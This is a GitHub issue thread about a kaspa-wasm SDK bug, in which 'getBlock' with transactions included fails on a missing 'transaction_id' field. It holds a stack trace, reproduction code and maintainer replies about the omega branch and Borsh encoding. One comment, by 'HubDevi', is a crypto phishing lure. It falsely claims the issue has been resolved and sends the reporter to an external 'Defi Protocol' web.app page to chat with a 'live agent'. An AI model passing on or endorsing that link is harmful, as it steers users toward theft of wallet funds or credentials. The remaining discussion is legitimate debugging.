### ISSUE TITLE
Error on `getBlock` when >1 tx in block (missing field `transaction_id`)

### ISSUE THREAD

**Issue by ZenVoich** [kaspanet/rusty-kaspa#515]
**Describe the bug**
Using kaspa-wasm from https://github.com/kaspanet/rusty-kaspa/actions/runs/10292945244 in nodejs.

When I try to get a block with >1 txs, it fails with error:
```
Error: RPC Server (remote error) -> RPC serde deserialization error: missing field `transaction_id`
    at module.exports.__wbindgen_error_new (/Users/zen/dev/kaspa-scanner/kaspa-wasm32-sdk/nodejs/kaspa/kaspa.js:13428:17)
    at wasm://wasm/02a9780a:wasm-function[836]:0x3285e9
    at wasm://wasm/02a9780a:wasm-function[2242]:0x520c8d
    at wasm://wasm/02a9780a:wasm-function[8028]:0x802d93
    at __wbg_adapter_89 (/Users/zen/dev/kaspa-scanner/kaspa-wasm32-sdk/nodejs/kaspa/kaspa.js:295:10)
    at real (/Users/zen/dev/kaspa-scanner/kaspa-wasm32-sdk/nodejs/kaspa/kaspa.js:250:20)
    at node:internal/process/task_queues:140:7
    at AsyncResource.runInAsyncScope (node:async_hooks:206:9)
    at AsyncResource.runMicrotask (node:internal/process/task_queues:137:8)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)

Node.js v22.4.0
```

**To Reproduce**
```js
import {RpcClient, Encoding, ConnectStrategy} from '../kaspa-wasm32-sdk/nodejs/kaspa/kaspa';

let url = "http://localhost:18110";
let rpc = new RpcClient({
	url,
	encoding: Encoding.SerdeJson,
});
let block = await rpc.getBlock({
	hash: '46f43a608d63f0e0e75628cbed31b04dd20a5a413d37955087bbb6779b1f2972',
	includeTransactions: true, // no error if 'false'
});
```

**Expected behavior**
Return a block with all transactions.

**Screenshots**

**Desktop (please complete the following information):**
 - OS: MacOS 14.5
 - Kaspad version: 0.14.1

**Additional context**

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the defi protocol page to initiate a chat with the live agent on the chat button to get more information about your request via [Defi Protocol](https://accessonlinedefiprotocol.web.app/)
@ZenVoich 
Regards.

**Comment by aspect** [comment]
If you can, please build the node from the same branch (https://github.com/aspectron/rusty-kaspa/tree/omega) and switch to using `Encoding.Borsh` (due to omega upgrading Borsh encoding, WASM32 needs to match the node).

Meanwhile we will take a look at what could cause this.

**Comment by ZenVoich** [comment]
@aspect, no errors with build from `omega` branch

**Comment by aspect** [comment]
No error in omega with Borsh or JSON?  The error originates from the JSON serializer, it won't present with Borsh.

If no error in JSON then it is still a reason for concern. In any case, I will be testing this later today or tomorrow as anything related to getBlock hasn't been touched for a very long time so it shouldn't really be having issues across different releases.
